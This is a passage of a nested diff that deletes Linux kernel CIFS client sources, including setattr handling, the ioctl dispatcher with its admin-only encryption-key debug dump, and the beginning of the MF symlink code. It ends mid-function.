+-			goto cifs_setattr_exit;
+-		else
+-			rc = 0;
+-	}
+-
+-	if (attrs->ia_valid & ATTR_SIZE) {
+-		rc = cifs_set_file_size(inode, attrs, xid, full_path);
+-		if (rc != 0)
+-			goto cifs_setattr_exit;
+-	}
+-
+-	if (attrs->ia_valid & ATTR_UID)
+-		uid = attrs->ia_uid;
+-
+-	if (attrs->ia_valid & ATTR_GID)
+-		gid = attrs->ia_gid;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
+-		if (uid_valid(uid) || gid_valid(gid)) {
+-			mode = NO_CHANGE_64;
+-			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
+-							uid, gid);
+-			if (rc) {
+-				cifs_dbg(FYI, "%s: Setting id failed with error: %d\n",
+-					 __func__, rc);
+-				goto cifs_setattr_exit;
+-			}
+-		}
+-	} else
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID))
+-		attrs->ia_valid &= ~(ATTR_UID | ATTR_GID);
+-
+-	/* skip mode change if it's just for clearing setuid/setgid */
+-	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
+-		attrs->ia_valid &= ~ATTR_MODE;
+-
+-	if (attrs->ia_valid & ATTR_MODE) {
+-		mode = attrs->ia_mode;
+-		rc = 0;
+-		if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
+-			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
+-						INVALID_UID, INVALID_GID);
+-			if (rc) {
+-				cifs_dbg(FYI, "%s: Setting ACL failed with error: %d\n",
+-					 __func__, rc);
+-				goto cifs_setattr_exit;
+-			}
+-
+-			/*
+-			 * In case of CIFS_MOUNT_CIFS_ACL, we cannot support all modes.
+-			 * Pick up the actual mode bits that were set.
+-			 */
+-			if (mode != attrs->ia_mode)
+-				attrs->ia_mode = mode;
+-		} else
+-		if (((mode & S_IWUGO) == 0) &&
+-		    (cifsInode->cifsAttrs & ATTR_READONLY) == 0) {
+-
+-			dosattr = cifsInode->cifsAttrs | ATTR_READONLY;
+-
+-			/* fix up mode if we're not using dynperm */
+-			if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM) == 0)
+-				attrs->ia_mode = inode->i_mode & ~S_IWUGO;
+-		} else if ((mode & S_IWUGO) &&
+-			   (cifsInode->cifsAttrs & ATTR_READONLY)) {
+-
+-			dosattr = cifsInode->cifsAttrs & ~ATTR_READONLY;
+-			/* Attributes of 0 are ignored */
+-			if (dosattr == 0)
+-				dosattr |= ATTR_NORMAL;
+-
+-			/* reset local inode permissions to normal */
+-			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
+-				attrs->ia_mode &= ~(S_IALLUGO);
+-				if (S_ISDIR(inode->i_mode))
+-					attrs->ia_mode |=
+-						cifs_sb->ctx->dir_mode;
+-				else
+-					attrs->ia_mode |=
+-						cifs_sb->ctx->file_mode;
+-			}
+-		} else if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
+-			/* ignore mode change - ATTR_READONLY hasn't changed */
+-			attrs->ia_valid &= ~ATTR_MODE;
+-		}
+-	}
+-
+-	if (attrs->ia_valid & (ATTR_MTIME|ATTR_ATIME|ATTR_CTIME) ||
+-	    ((attrs->ia_valid & ATTR_MODE) && dosattr)) {
+-		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
+-		/* BB: check for rc = -EOPNOTSUPP and switch to legacy mode */
+-
+-		/* Even if the time set fails, there is no sense failing the
+-		call if the server would set the time to a reasonable value
+-		anyway; this check ensures that we are not being called from
+-		sys_utimes, in which case we ought to fail the call back to
+-		the user when the server rejects the call */
+-		if ((rc) && (attrs->ia_valid &
+-				(ATTR_MODE | ATTR_GID | ATTR_UID | ATTR_SIZE)))
+-			rc = 0;
+-	}
+-
+-	/* no need for a local inode_check_ok check since the server does
+-	   that */
+-	if (rc)
+-		goto cifs_setattr_exit;
+-
+-	if ((attrs->ia_valid & ATTR_SIZE) &&
+-	    attrs->ia_size != i_size_read(inode)) {
+-		truncate_setsize(inode, attrs->ia_size);
+-		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, attrs);
+-	mark_inode_dirty(inode);
+-
+-cifs_setattr_exit:
+-	free_xid(xid);
+-	free_dentry_path(page);
+-	return rc;
+-}
+-
+-int
+-cifs_setattr(struct user_namespace *mnt_userns, struct dentry *direntry,
+-	     struct iattr *attrs)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	int rc, retries = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_tcon *pTcon = cifs_sb_master_tcon(cifs_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	do {
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-		if (pTcon->unix_ext)
+-			rc = cifs_setattr_unix(direntry, attrs);
+-		else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-			rc = cifs_setattr_nounix(direntry, attrs);
+-		retries++;
+-	} while (is_retryable_error(rc) && retries < 2);
+-
+-	/* BB: add cifs_setattr_legacy for really old servers */
+-	return rc;
+-}
+diff --git a/fs/cifs/ioctl.c b/fs/cifs/ioctl.c
+deleted file mode 100644
+index 6419ec47c2a85..0000000000000
+--- a/fs/cifs/ioctl.c
++++ /dev/null
+@@ -1,526 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with io control
+- *
+- *   Copyright (C) International Business Machines  Corp., 2005,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/file.h>
+-#include <linux/mount.h>
+-#include <linux/mm.h>
+-#include <linux/pagemap.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-#include "cifs_ioctl.h"
+-#include "smb2proto.h"
+-#include "smb2glob.h"
+-#include <linux/btrfs.h>
+-
+-static long cifs_ioctl_query_info(unsigned int xid, struct file *filep,
+-				  unsigned long p)
+-{
+-	struct inode *inode = file_inode(filep);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct dentry *dentry = filep->f_path.dentry;
+-	const unsigned char *path;
+-	void *page = alloc_dentry_path();
+-	__le16 *utf16_path = NULL, root_path;
+-	int rc = 0;
+-
+-	path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(path)) {
+-		free_dentry_path(page);
+-		return PTR_ERR(path);
+-	}
+-
+-	cifs_dbg(FYI, "%s %s\n", __func__, path);
+-
+-	if (!path[0]) {
+-		root_path = 0;
+-		utf16_path = &root_path;
+-	} else {
+-		utf16_path = cifs_convert_path_to_utf16(path + 1, cifs_sb);
+-		if (!utf16_path) {
+-			rc = -ENOMEM;
+-			goto ici_exit;
+-		}
+-	}
+-
+-	if (tcon->ses->server->ops->ioctl_query_info)
+-		rc = tcon->ses->server->ops->ioctl_query_info(
+-				xid, tcon, cifs_sb, utf16_path,
+-				filep->private_data ? 0 : 1, p);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+- ici_exit:
+-	if (utf16_path != &root_path)
+-		kfree(utf16_path);
+-	free_dentry_path(page);
+-	return rc;
+-}
+-
+-static long cifs_ioctl_copychunk(unsigned int xid, struct file *dst_file,
+-			unsigned long srcfd)
+-{
+-	int rc;
+-	struct fd src_file;
+-	struct inode *src_inode;
+-
+-	cifs_dbg(FYI, "ioctl copychunk range\n");
+-	/* the destination must be opened for writing */
+-	if (!(dst_file->f_mode & FMODE_WRITE)) {
+-		cifs_dbg(FYI, "file target not open for write\n");
+-		return -EINVAL;
+-	}
+-
+-	/* check if target volume is readonly and take reference */
+-	rc = mnt_want_write_file(dst_file);
+-	if (rc) {
+-		cifs_dbg(FYI, "mnt_want_write failed with rc %d\n", rc);
+-		return rc;
+-	}
+-
+-	src_file = fdget(srcfd);
+-	if (!src_file.file) {
+-		rc = -EBADF;
+-		goto out_drop_write;
+-	}
+-
+-	if (src_file.file->f_op->unlocked_ioctl != cifs_ioctl) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "src file seems to be from a different filesystem type\n");
+-		goto out_fput;
+-	}
+-
+-	src_inode = file_inode(src_file.file);
+-	rc = -EINVAL;
+-	if (S_ISDIR(src_inode->i_mode))
+-		goto out_fput;
+-
+-	rc = cifs_file_copychunk_range(xid, src_file.file, 0, dst_file, 0,
+-					src_inode->i_size, 0);
+-	if (rc > 0)
+-		rc = 0;
+-out_fput:
+-	fdput(src_file);
+-out_drop_write:
+-	mnt_drop_write_file(dst_file);
+-	return rc;
+-}
+-
+-static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
+-				void __user *arg)
+-{
+-	int rc = 0;
+-	struct smb_mnt_fs_info *fsinf;
+-
+-	fsinf = kzalloc(sizeof(struct smb_mnt_fs_info), GFP_KERNEL);
+-	if (fsinf == NULL)
+-		return -ENOMEM;
+-
+-	fsinf->version = 1;
+-	fsinf->protocol_id = tcon->ses->server->vals->protocol_id;
+-	fsinf->device_characteristics =
+-			le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics);
+-	fsinf->device_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
+-	fsinf->fs_attributes = le32_to_cpu(tcon->fsAttrInfo.Attributes);
+-	fsinf->max_path_component =
+-		le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
+-	fsinf->vol_serial_number = tcon->vol_serial_number;
+-	fsinf->vol_create_time = le64_to_cpu(tcon->vol_create_time);
+-	fsinf->share_flags = tcon->share_flags;
+-	fsinf->share_caps = le32_to_cpu(tcon->capabilities);
+-	fsinf->sector_flags = tcon->ss_flags;
+-	fsinf->optimal_sector_size = tcon->perf_sector_size;
+-	fsinf->max_bytes_chunk = tcon->max_bytes_chunk;
+-	fsinf->maximal_access = tcon->maximal_access;
+-	fsinf->cifs_posix_caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-
+-	if (copy_to_user(arg, fsinf, sizeof(struct smb_mnt_fs_info)))
+-		rc = -EFAULT;
+-
+-	kfree(fsinf);
+-	return rc;
+-}
+-
+-static int cifs_shutdown(struct super_block *sb, unsigned long arg)
+-{
+-	struct cifs_sb_info *sbi = CIFS_SB(sb);
+-	__u32 flags;
+-
+-	if (!capable(CAP_SYS_ADMIN))
+-		return -EPERM;
+-
+-	if (get_user(flags, (__u32 __user *)arg))
+-		return -EFAULT;
+-
+-	if (flags > CIFS_GOING_FLAGS_NOLOGFLUSH)
+-		return -EINVAL;
+-
+-	if (cifs_forced_shutdown(sbi))
+-		return 0;
+-
+-	cifs_dbg(VFS, "shut down requested (%d)", flags);
+-/*	trace_cifs_shutdown(sb, flags);*/
+-
+-	/*
+-	 * see:
+-	 *   https://man7.org/linux/man-pages/man2/ioctl_xfs_goingdown.2.html
+-	 * for more information and a description of the original intent of
+-	 * the flags
+-	 */
+-	switch (flags) {
+-	/*
+-	 * We could add support later for the default flag, which requires:
+-	 *     "Flush all dirty data and metadata to disk"
+-	 * This would need to call syncfs or equivalent to flush the page
+-	 * cache for the mount and then issue fsync to the server (if
+-	 * nostrictsync is not set).
+-	 */
+-	case CIFS_GOING_FLAGS_DEFAULT:
+-		cifs_dbg(FYI, "shutdown with default flag not supported\n");
+-		return -EINVAL;
+-	/*
+-	 * FLAGS_LOGFLUSH is easy since it asks to write out metadata (not
+-	 * data), but metadata writes are not cached on the client, so we can
+-	 * treat it similarly to NOLOGFLUSH
+-	 */
+-	case CIFS_GOING_FLAGS_LOGFLUSH:
+-	case CIFS_GOING_FLAGS_NOLOGFLUSH:
+-		sbi->mnt_cifs_flags |= CIFS_MOUNT_SHUTDOWN;
+-		return 0;
+-	default:
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
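+-
+-/*
+- * Hypothetical userspace invocation (sketch only; assumes the ioctl
+- * number and the CIFS_GOING_FLAGS_* values from fs/cifs/cifs_ioctl.h
+- * are visible to the caller):
+- *
+- *   int fd = open("/mnt/cifs", O_RDONLY);
+- *   __u32 flags = CIFS_GOING_FLAGS_NOLOGFLUSH;
+- *
+- *   if (ioctl(fd, CIFS_IOC_SHUTDOWN, &flags) == -1)
+- *           perror("CIFS_IOC_SHUTDOWN");
+- */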
+-
+-static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug_info __user *in)
+-{
+-	struct smb3_full_key_debug_info out;
+-	struct cifs_ses *ses;
+-	int rc = 0;
+-	bool found = false;
+-	u8 __user *end;
+-
+-	if (!smb3_encryption_required(tcon)) {
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* copy user input into our output buffer */
+-	if (copy_from_user(&out, in, sizeof(out))) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (!out.session_id) {
+-		/* if ses id is 0, use current user session */
+-		ses = tcon->ses;
+-	} else {
+-		/* otherwise if a session id is given, look for it in all our sessions */
+-		struct cifs_ses *ses_it = NULL;
+-		struct TCP_Server_Info *server_it = NULL;
+-
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(server_it, &cifs_tcp_ses_list, tcp_ses_list) {
+-			list_for_each_entry(ses_it, &server_it->smb_ses_list, smb_ses_list) {
+-				if (ses_it->Suid == out.session_id) {
+-					ses = ses_it;
+-					/*
+-					 * since we are using the session outside the crit
+-					 * section, we need to make sure it won't be released,
+-					 * so increment its refcount
+-					 */
+-					ses->ses_count++;
+-					found = true;
+-					goto search_end;
+-				}
+-			}
+-		}
+-search_end:
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (!found) {
+-			rc = -ENOENT;
+-			goto out;
+-		}
+-	}
+-
+-	switch (ses->server->cipher_type) {
+-	case SMB2_ENCRYPTION_AES128_CCM:
+-	case SMB2_ENCRYPTION_AES128_GCM:
+-		out.session_key_length = CIFS_SESS_KEY_SIZE;
+-		out.server_in_key_length = out.server_out_key_length = SMB3_GCM128_CRYPTKEY_SIZE;
+-		break;
+-	case SMB2_ENCRYPTION_AES256_CCM:
+-	case SMB2_ENCRYPTION_AES256_GCM:
+-		out.session_key_length = CIFS_SESS_KEY_SIZE;
+-		out.server_in_key_length = out.server_out_key_length = SMB3_GCM256_CRYPTKEY_SIZE;
+-		break;
+-	default:
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* check if user buffer is big enough to store all the keys */
+-	if (out.in_size < sizeof(out) + out.session_key_length + out.server_in_key_length
+-	    + out.server_out_key_length) {
+-		rc = -ENOBUFS;
+-		goto out;
+-	}
+-
+-	out.session_id = ses->Suid;
+-	out.cipher_type = le16_to_cpu(ses->server->cipher_type);
+-
+-	/* overwrite user input with our output */
+-	if (copy_to_user(in, &out, sizeof(out))) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	/* append all the keys at the end of the user buffer */
+-	end = in->data;
+-	if (copy_to_user(end, ses->auth_key.response, out.session_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	end += out.session_key_length;
+-
+-	if (copy_to_user(end, ses->smb3encryptionkey, out.server_in_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	end += out.server_in_key_length;
+-
+-	if (copy_to_user(end, ses->smb3decryptionkey, out.server_out_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-out:
+-	if (found)
+-		cifs_put_smb_ses(ses);
+-	return rc;
+-}
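+-
+-/*
+- * Resulting layout of the user buffer on success (illustrative):
+- *
+- *   [ struct smb3_full_key_debug_info ]
+- *   [ session key    (session_key_length bytes)    ]
+- *   [ server-in key  (server_in_key_length bytes)  ]
+- *   [ server-out key (server_out_key_length bytes) ]
+- *
+- * in_size must cover all four pieces or -ENOBUFS is returned above.
+- */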
+-
+-long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
+-{
+-	struct inode *inode = file_inode(filep);
+-	struct smb3_key_debug_info pkey_inf;
+-	int rc = -ENOTTY; /* strange error - but the precedent */
+-	unsigned int xid;
+-	struct cifsFileInfo *pSMBFile = filep->private_data;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb;
+-	__u64	ExtAttrBits = 0;
+-	__u64   caps;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "cifs ioctl 0x%x\n", command);
+-	switch (command) {
+-		case FS_IOC_GETFLAGS:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-#ifdef CONFIG_CIFS_POSIX
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-			if (CIFS_UNIX_EXTATTR_CAP & caps) {
+-				__u64	ExtAttrMask = 0;
+-				rc = CIFSGetExtAttr(xid, tcon,
+-						    pSMBFile->fid.netfid,
+-						    &ExtAttrBits, &ExtAttrMask);
+-				if (rc == 0)
+-					rc = put_user(ExtAttrBits &
+-						FS_FL_USER_VISIBLE,
+-						(int __user *)arg);
+-				if (rc != -EOPNOTSUPP)
+-					break;
+-			}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-#endif /* CONFIG_CIFS_POSIX */
+-			rc = 0;
+-			if (CIFS_I(inode)->cifsAttrs & ATTR_COMPRESSED) {
+-				/* add in the compressed bit */
+-				ExtAttrBits = FS_COMPR_FL;
+-				rc = put_user(ExtAttrBits & FS_FL_USER_VISIBLE,
+-					      (int __user *)arg);
+-			}
+-			break;
+-		case FS_IOC_SETFLAGS:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			/* caps = le64_to_cpu(tcon->fsUnixInfo.Capability); */
+-
+-			if (get_user(ExtAttrBits, (int __user *)arg)) {
+-				rc = -EFAULT;
+-				break;
+-			}
+-
+-			/*
+-			 * if (CIFS_UNIX_EXTATTR_CAP & caps)
+-			 *	rc = CIFSSetExtAttr(xid, tcon,
+-			 *		       pSMBFile->fid.netfid,
+-			 *		       extAttrBits,
+-			 *		       &ExtAttrMask);
+-			 * if (rc != -EOPNOTSUPP)
+-			 *	break;
+-			 */
+-
+-			/* Currently the only flag we can set is the compressed flag */
+-			if ((ExtAttrBits & FS_COMPR_FL) == 0)
+-				break;
+-
+-			/* Try to set compress flag */
+-			if (tcon->ses->server->ops->set_compression) {
+-				rc = tcon->ses->server->ops->set_compression(
+-							xid, tcon, pSMBFile);
+-				cifs_dbg(FYI, "set compress flag rc %d\n", rc);
+-			}
+-			break;
+-		case CIFS_IOC_COPYCHUNK_FILE:
+-			rc = cifs_ioctl_copychunk(xid, filep, arg);
+-			break;
+-		case CIFS_QUERY_INFO:
+-			rc = cifs_ioctl_query_info(xid, filep, arg);
+-			break;
+-		case CIFS_IOC_SET_INTEGRITY:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (tcon->ses->server->ops->set_integrity)
+-				rc = tcon->ses->server->ops->set_integrity(xid,
+-						tcon, pSMBFile);
+-			else
+-				rc = -EOPNOTSUPP;
+-			break;
+-		case CIFS_IOC_GET_MNT_INFO:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
+-			break;
+-		case CIFS_ENUMERATE_SNAPSHOTS:
+-			if (pSMBFile == NULL)
+-				break;
+-			if (arg == 0) {
+-				rc = -EINVAL;
+-				goto cifs_ioc_exit;
+-			}
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (tcon->ses->server->ops->enum_snapshots)
+-				rc = tcon->ses->server->ops->enum_snapshots(xid, tcon,
+-						pSMBFile, (void __user *)arg);
+-			else
+-				rc = -EOPNOTSUPP;
+-			break;
+-		case CIFS_DUMP_KEY:
+-			/*
+-			 * Dump encryption keys. This is an old ioctl that only
+-			 * handles AES-128-{CCM,GCM}.
+-			 */
+-			if (pSMBFile == NULL)
+-				break;
+-			if (!capable(CAP_SYS_ADMIN)) {
+-				rc = -EACCES;
+-				break;
+-			}
+-
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			if (!smb3_encryption_required(tcon)) {
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			pkey_inf.cipher_type =
+-				le16_to_cpu(tcon->ses->server->cipher_type);
+-			pkey_inf.Suid = tcon->ses->Suid;
+-			memcpy(pkey_inf.auth_key, tcon->ses->auth_key.response,
+-					16 /* SMB2_NTLMV2_SESSKEY_SIZE */);
+-			memcpy(pkey_inf.smb3decryptionkey,
+-			      tcon->ses->smb3decryptionkey, SMB3_SIGN_KEY_SIZE);
+-			memcpy(pkey_inf.smb3encryptionkey,
+-			      tcon->ses->smb3encryptionkey, SMB3_SIGN_KEY_SIZE);
+-			if (copy_to_user((void __user *)arg, &pkey_inf,
+-					sizeof(struct smb3_key_debug_info)))
+-				rc = -EFAULT;
+-			else
+-				rc = 0;
+-			break;
+-		case CIFS_DUMP_FULL_KEY:
+-			/*
+-			 * Dump encryption keys (handles any key sizes)
+-			 */
+-			if (pSMBFile == NULL)
+-				break;
+-			if (!capable(CAP_SYS_ADMIN)) {
+-				rc = -EACCES;
+-				break;
+-			}
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			rc = cifs_dump_full_key(tcon, (void __user *)arg);
+-			break;
+-		case CIFS_IOC_NOTIFY:
+-			if (!S_ISDIR(inode->i_mode)) {
+-				/* Notify can only be done on directories */
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cifs_sb = CIFS_SB(inode->i_sb);
+-			tlink = cifs_sb_tlink(cifs_sb);
+-			if (IS_ERR(tlink)) {
+-				rc = PTR_ERR(tlink);
+-				break;
+-			}
+-			tcon = tlink_tcon(tlink);
+-			if (tcon && tcon->ses->server->ops->notify) {
+-				rc = tcon->ses->server->ops->notify(xid,
+-						filep, (void __user *)arg,
+-						false /* no ret data */);
+-				cifs_dbg(FYI, "ioctl notify rc %d\n", rc);
+-			} else
+-				rc = -EOPNOTSUPP;
+-			cifs_put_tlink(tlink);
+-			break;
+-		case CIFS_IOC_NOTIFY_INFO:
+-			if (!S_ISDIR(inode->i_mode)) {
+-				/* Notify can only be done on directories */
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cifs_sb = CIFS_SB(inode->i_sb);
+-			tlink = cifs_sb_tlink(cifs_sb);
+-			if (IS_ERR(tlink)) {
+-				rc = PTR_ERR(tlink);
+-				break;
+-			}
+-			tcon = tlink_tcon(tlink);
+-			if (tcon && tcon->ses->server->ops->notify) {
+-				rc = tcon->ses->server->ops->notify(xid,
+-						filep, (void __user *)arg,
+-						true /* return details */);
+-				cifs_dbg(FYI, "ioctl notify info rc %d\n", rc);
+-			} else
+-				rc = -EOPNOTSUPP;
+-			cifs_put_tlink(tlink);
+-			break;
+-		case CIFS_IOC_SHUTDOWN:
+-			rc = cifs_shutdown(inode->i_sb, arg);
+-			break;
+-		default:
+-			cifs_dbg(FYI, "unsupported ioctl\n");
+-			break;
+-	}
+-cifs_ioc_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+deleted file mode 100644
+index c0f101fc1e5d0..0000000000000
+--- a/fs/cifs/link.c
++++ /dev/null
+@@ -1,650 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/namei.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "smb2proto.h"
+-#include "cifs_ioctl.h"
+-
+-/*
+- * M-F Symlink Functions - Begin
+- */
+-
+-#define CIFS_MF_SYMLINK_LEN_OFFSET (4+1)
+-#define CIFS_MF_SYMLINK_MD5_OFFSET (CIFS_MF_SYMLINK_LEN_OFFSET+(4+1))
+-#define CIFS_MF_SYMLINK_LINK_OFFSET (CIFS_MF_SYMLINK_MD5_OFFSET+(32+1))
+-#define CIFS_MF_SYMLINK_LINK_MAXLEN (1024)
+-#define CIFS_MF_SYMLINK_FILE_SIZE \
+-	(CIFS_MF_SYMLINK_LINK_OFFSET + CIFS_MF_SYMLINK_LINK_MAXLEN)
+-
+-#define CIFS_MF_SYMLINK_LEN_FORMAT "XSym\n%04u\n"
+-#define CIFS_MF_SYMLINK_MD5_FORMAT "%16phN\n"
+-#define CIFS_MF_SYMLINK_MD5_ARGS(md5_hash) md5_hash
+-
+-static int
+-symlink_hash(unsigned int link_len, const char *link_str, u8 *md5_hash)
+-{
+-	int rc;
+-	struct shash_desc *md5 = NULL;
+-
+-	rc = cifs_alloc_hash("md5", &md5);
+-	if (rc)
+-		goto symlink_hash_err;
+-
+-	rc = crypto_shash_init(md5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init md5 shash\n", __func__);
+-		goto symlink_hash_err;
+-	}
+-	rc = crypto_shash_update(md5, link_str, link_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with link_str\n", __func__);
+-		goto symlink_hash_err;
+-	}
+-	rc = crypto_shash_final(md5, md5_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-symlink_hash_err:
+-	cifs_free_hash(&md5);
+-	return rc;
+-}
+-
+-static int
+-parse_mf_symlink(const u8 *buf, unsigned int buf_len, unsigned int *_link_len,
+-		 char **_link_str)
+-{
+-	int rc;
+-	unsigned int link_len;
+-	const char *md5_str1;
+-	const char *link_str;
+-	u8 md5_hash[16];
+-	char md5_str2[34];
+-
+-	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
+-		return -EINVAL;
+-
+-	md5_str1 = (const char *)&buf[CIFS_MF_SYMLINK_MD5_OFFSET];
+-	link_str = (const char *)&buf[CIFS_MF_SYMLINK_LINK_OFFSET];
+-
+-	rc = sscanf(buf, CIFS_MF_SYMLINK_LEN_FORMAT, &link_len);
+-	if (rc != 1)
+-		return -EINVAL;
+-
+-	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
+-		return -EINVAL;
+-
+-	rc = symlink_hash(link_len, link_str, md5_hash);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	scnprintf(md5_str2, sizeof(md5_str2),
+-		  CIFS_MF_SYMLINK_MD5_FORMAT,
+-		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
+-
+-	if (strncmp(md5_str1, md5_str2, 17) != 0)
+-		return -EINVAL;
+-
+-	if (_link_str) {
+-		*_link_str = kstrndup(link_str, link_len, GFP_KERNEL);
+-		if (!*_link_str)
+-			return -ENOMEM;
+-	}
+-
+-	*_link_len = link_len;
+-	return 0;
+-}
+-
+-static int
+-format_mf_symlink(u8 *buf, unsigned int buf_len, const char *link_str)
+-{
+-	int rc;
+-	unsigned int link_len;
+-	unsigned int ofs;
+-	u8 md5_hash[16];
+-
+-	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
+-		return -EINVAL;
+-
+-	link_len = strlen(link_str);
+-
+-	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
+-		return -ENAMETOOLONG;
+-
+-	rc = symlink_hash(link_len, link_str, md5_hash);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	scnprintf(buf, buf_len,
+-		  CIFS_MF_SYMLINK_LEN_FORMAT CIFS_MF_SYMLINK_MD5_FORMAT,
+-		  link_len,
+-		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
+-
+-	ofs = CIFS_MF_SYMLINK_LINK_OFFSET;
+-	memcpy(buf + ofs, link_str, link_len);
+-
+-	ofs += link_len;
+-	if (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
+-		buf[ofs] = '\n';
+-		ofs++;
+-	}
+-
+-	while (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
+-		buf[ofs] = ' ';
+-		ofs++;
+-	}
+-
+-	return 0;
+-}
+-
+-bool
+-couldbe_mf_symlink(const struct cifs_fattr *fattr)
+-{
+-	if (!S_ISREG(fattr->cf_mode))
+-		/* it's not a symlink */
+-		return false;
+-
+-	if (fattr->cf_eof != CIFS_MF_SYMLINK_FILE_SIZE)
+-		/* it's not a symlink */
+-		return false;
+-
+-	return true;
+-}
+-
+-static int
+-create_mf_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		  struct cifs_sb_info *cifs_sb, const char *fromName,
+-		  const char *toName)
+-{
+-	int rc;
+-	u8 *buf;
+-	unsigned int bytes_written = 0;
+-
